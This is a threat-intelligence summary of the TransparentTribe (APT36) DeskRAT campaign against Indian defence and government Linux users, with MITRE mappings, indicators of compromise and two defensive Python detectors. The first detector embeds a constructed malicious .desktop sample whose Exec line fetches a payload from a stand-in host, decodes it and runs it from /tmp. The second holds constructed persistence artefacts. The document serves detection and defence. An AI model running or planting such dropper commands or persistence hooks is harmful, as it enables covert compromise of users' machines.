TransparentTribe targets Indian military organisations with DeskRAT

TransparentTribe (APT36) conducted a phishing campaign in mid-2025 targeting Linux systems used by Indian government entities, delivering a Golang-based RAT dubbed DeskRAT via malicious .desktop files inside ZIP archives hosted on staging servers. The malware establishes WebSocket C2 communications, supports file collection and remote execution, and uses persistence methods tailored to Linux (systemd service, cron, autostart .desktop, and .bashrc), with decoy PDFs referencing Indian defense events. #DeskRAT #TransparentTribe

Keypoints

  • Phishing emails delivered ZIP archives (previously via Google Drive, later hosted on dedicated staging servers) containing a malicious DESKTOP file that executes a Bash one-liner to fetch and run a payload.
  • The DESKTOP dropper downloads a hex-then-base64 encoded payload (Gimpfile.txt), decodes it, writes it to /tmp/, makes it executable, runs it, and opens a decoy PDF in Firefox to hide malicious activity.
  • The final payload, DeskRAT, is a Golang RAT that communicates over plaintext (ws://) WebSocket connections to multiple C2 endpoints and sends an initial JSON “heartbeat” with host fingerprinting and some hardcoded/fake fields.
  • DeskRAT implements multiple Linux-specific persistence mechanisms: systemd unit creation, cron job addition, autostart .desktop creation, and .bashrc-startup script installation.
  • C2 infrastructure includes web-admin interfaces (/login, /dashboard) and static JS/CSS supporting real-time client management, file browsing, upload/execute, and remote interactive sessions.
  • Decoy PDFs reference contemporary Indian events (Ladakh protests, RMC Mumbai posting) to increase targeting credibility and lure victims in defense and government organizations.
  • Analysis indicates use of LLM-assisted development patterns in DeskRAT (uniform, descriptive function names and redundant/evasive code), and ongoing campaign evolution with new domains and payload variants.
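
As an added illustration of the dropper pattern described in the keypoints (this is not code from the Sekoia report or from the campaign), the following Python checks a .desktop entry for the traits listed above: a PDF-looking Name/Icon paired with a bash -c Exec line that fetches, hex- and base64-decodes, drops to /tmp and executes a payload. The two sample entries and the staging URL in them are constructed.

```python
import re
from configparser import ConfigParser

# Constructed sample modelled on the dropper pattern described above (not the real file):
# a .desktop entry that masquerades as a PDF and runs a fetch-decode-execute one-liner.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=MoM_regarding_Defence_Sectors.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://staging.example/Gimpfile.txt | xxd -r -p | base64 -d > /tmp/x; chmod +x /tmp/x; /tmp/x & firefox /tmp/decoy.pdf"
"""

# Constructed benign entry for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Exec=gnome-text-editor %U
"""

# Each rule is (finding label, regex applied to the Exec= value).
EXEC_RULES = [
    ("shell-wrapper",  re.compile(r"^(ba)?sh\s+-c\b")),
    ("remote-fetch",   re.compile(r"\b(curl|wget)\b")),
    ("hex-decode",     re.compile(r"\bxxd\s+-r\s+-p\b")),
    ("base64-decode",  re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("drops-to-tmp",   re.compile(r">\s*/tmp/")),
    ("chmod-exec",     re.compile(r"\bchmod\s+\+?x\b")),
]

def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, preserving key case (Exec, Icon, ...)."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}

def analyse_desktop(text):
    """Return the list of finding labels that match this .desktop entry (empty if clean)."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    findings = [label for label, rx in EXEC_RULES if rx.search(exec_line)]
    # Masquerading: a PDF icon or a .pdf display name paired with a shell-wrapper Exec line.
    looks_like_pdf = ("pdf" in entry.get("Icon", "").lower()
                      or entry.get("Name", "").lower().endswith(".pdf"))
    if looks_like_pdf and "shell-wrapper" in findings:
        findings.append("pdf-masquerade")
    return findings
```

A single hit such as remote-fetch is weak on its own; the combination of the decode chain, the /tmp drop and the PDF masquerade is what distinguishes this dropper from ordinary launchers.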

MITRE Techniques

  • [T1193] Spearphishing Attachment – Malicious ZIP attachments in phishing emails delivered a DESKTOP file that executes a Bash one-liner to fetch and run further payloads. Quote: ‘phishing emails containing a ZIP archive as an attachment.’
  • [T1204.002] User Execution: Malicious File – The DESKTOP file is presented with a PDF icon and autostart attributes to encourage execution; the file runs a bash -c command to download and execute payloads. Quote: ‘Exec=bash -c … curl … | xxd -r -p | base64 -d)’
  • [T1105] Ingress Tool Transfer – The dropper downloads Gimpfile.txt from staging servers (and earlier via Google Drive), decodes hex and base64, and writes the final binary to /tmp. Quote: ‘Downloads the file Gimpfile.txt from a remote staging server … Converting hexadecimal to binary with xxd -r -p … Decoding the resulting data from Base64’
  • [T1547.001] Boot or Logon Autostart Execution: Systemd Service – DeskRAT installs persistence by creating a systemd service unit to run the sample at startup. Quote: ‘CreateSystemdServiceUnit will create a service using a basic unit template’
  • [T1543.003] Create or Modify System Process: Cron – The malware adds a cron job to start the sample every minute as a persistence mechanism. Quote: ‘AddToCrontabScheduler will add a cron job starting the sample every minutes’
  • [T1547.001] Boot or Logon Autostart Execution: Autostart (.desktop) – DeskRAT creates $HOME/.config/autostart/system-backup.desktop to achieve persistence in desktop environments. Quote: ‘CreateAutostartDesktopFile will create $HOME/.config/autostart/system-backup.desktop’
  • [T1543.001] Create or Modify System Process: Bash Startup Script – The malware writes a startup script and adds execution in .bashrc to ensure execution on shell login. Quote: ‘CreateBashStartupScript writes … and adds a line in .bashrc that checks if the bash script exists, and then executes it.’
  • [T1071.001] Application Layer Protocol: Web Protocols – DeskRAT uses WebSocket (ws://…:8080/ws) for C2 communications and exchanges JSON messages for commands and telemetry. Quote: ‘establishes a WebSocket connection to the /ws endpoint on port 8080’
  • [T1106] Native API – Remote Execution – DeskRAT supports commands to upload and execute files of various types, invoking interpreters or executables (python, sh, xdg-open). Quote: ‘For .py : exec.Command(“python”, filePath) … For .desktop : exec.Command(“xdg-open”, filePath)’
  • [T1005] Data from Local System – File Collection – The ‘start_collection’ command searches for and exfiltrates files matching many document and archive extensions under 100MB via the WebSocket. Quote: ‘Search for file with extension: bmp, doc, … pdf, png … Every file under 100MB that matches, will be sent over the websocket.’
  • [T1496] Exploit Public-Facing Application – Staging/C2 Infrastructure – Use of dedicated staging servers hosting ZIPs and C2 web interfaces (/login, /dashboard) to deliver and control malware. Quote: ‘staging server which hosts the ZIP files’ and ‘C2 servers … serve an authentication page at the /login endpoint’
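
To show how the four persistence mechanisms in the entries above surface on disk, here is an added triage routine (not from the report or the malware) that scans constructed copies of a systemd unit, a crontab, a .bashrc and an autostart entry for the described patterns: ExecStart/Exec pointing at a temp or hidden path, an every-minute cron line, and a .bashrc line that tests for a script and runs it. All paths and file contents below are constructed.

```python
import re

# Constructed artefacts modelled on the four persistence mechanisms described above
# (not copied from the real sample): a systemd unit, a crontab, a .bashrc and an autostart entry.
ARTEFACTS = {
    "/etc/systemd/system/sysbackup.service":
        "[Unit]\nDescription=System Backup\n[Service]\nExecStart=/tmp/.cache/svc\n"
        "Restart=always\n[Install]\nWantedBy=multi-user.target\n",
    "/var/spool/cron/crontabs/user":
        "0 3 * * * /usr/bin/backup.sh\n* * * * * /tmp/.cache/svc\n",
    "/home/user/.bashrc":
        "alias ll='ls -la'\n[ -f ~/.config/.startup.sh ] && bash ~/.config/.startup.sh\n",
    "/home/user/.config/autostart/system-backup.desktop":
        "[Desktop Entry]\nType=Application\nExec=/tmp/.cache/svc\nHidden=false\n",
}

# Executables living in temp directories or hidden dot-paths under a user's config directory.
SUSPICIOUS_PATH = re.compile(r"(^|[\s=~])(/tmp/|/dev/shm/|/var/tmp/|~?/\.config/\.|/home/[^/]+/\.[^/]+/\.)")
# Cron schedule of five asterisks: run every minute.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")
# "[ -f <script> ] && bash <script>" style line appended to .bashrc.
BASHRC_HOOK = re.compile(r"\[\s*-f\s+\S+\s*\]\s*&&\s*(bash|sh)\s")

def triage_artefacts(artefacts):
    """Return sorted (path, reason) pairs for artefacts matching the DeskRAT-style persistence patterns."""
    hits = set()
    for path, text in artefacts.items():
        for line in text.splitlines():
            line = line.strip()
            if path.endswith(".service") and line.startswith("ExecStart=") and SUSPICIOUS_PATH.search(line):
                hits.add((path, "systemd unit runs a binary from a temp/hidden path"))
            elif "/cron" in path and EVERY_MINUTE.match(line):
                hits.add((path, "cron job scheduled every minute"))
            elif path.endswith(".bashrc") and BASHRC_HOOK.search(line):
                hits.add((path, ".bashrc conditionally executes a script on shell login"))
            elif "/autostart/" in path and line.startswith("Exec=") and SUSPICIOUS_PATH.search(line):
                hits.add((path, "autostart entry runs a binary from a temp/hidden path"))
    return sorted(hits)
```

On a live host the same checks would be fed from the real unit, crontab, .bashrc and autostart files; the autostart file name system-backup.desktop quoted above is itself worth matching directly.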

Indicators of Compromise

  • [File hash] DeskRAT sample – MD5 3563518ef8389c7c7ac2a80984a2c4cd (final payload)
  • [File hash] Malicious ZIP – MD5 4c56fedd177108a8849cec423f020625 (MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip)
  • [Domain] Staging/C2 hosts – modgovindia[.]com (used to host Gimpfile.txt and decoy PDFs), seeconnectionalive[.]website (C2), and newforsomething[.]rest (C2)
  • [IP address] C2 server – 147.93.155[.]118:8080 (WebSocket C2 endpoint ws://147.93.155[.]118:8080/ws)
  • [Filename] Dropper and decoys – MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.desktop (DESKTOP dropper), CDS_Directive_Armed_Forces.pdf and POsting of Offrs to RMC Mumbai.pdf (decoy documents)
  • [URL paths] C2 endpoints and assets – /ws (WebSocket endpoint), /login (C2 auth page), /static/js and /static/css (dashboard/js assets)


Read more: https://blog.sekoia.io/transparenttribe-targets-indian-military-organisations-with-deskrat/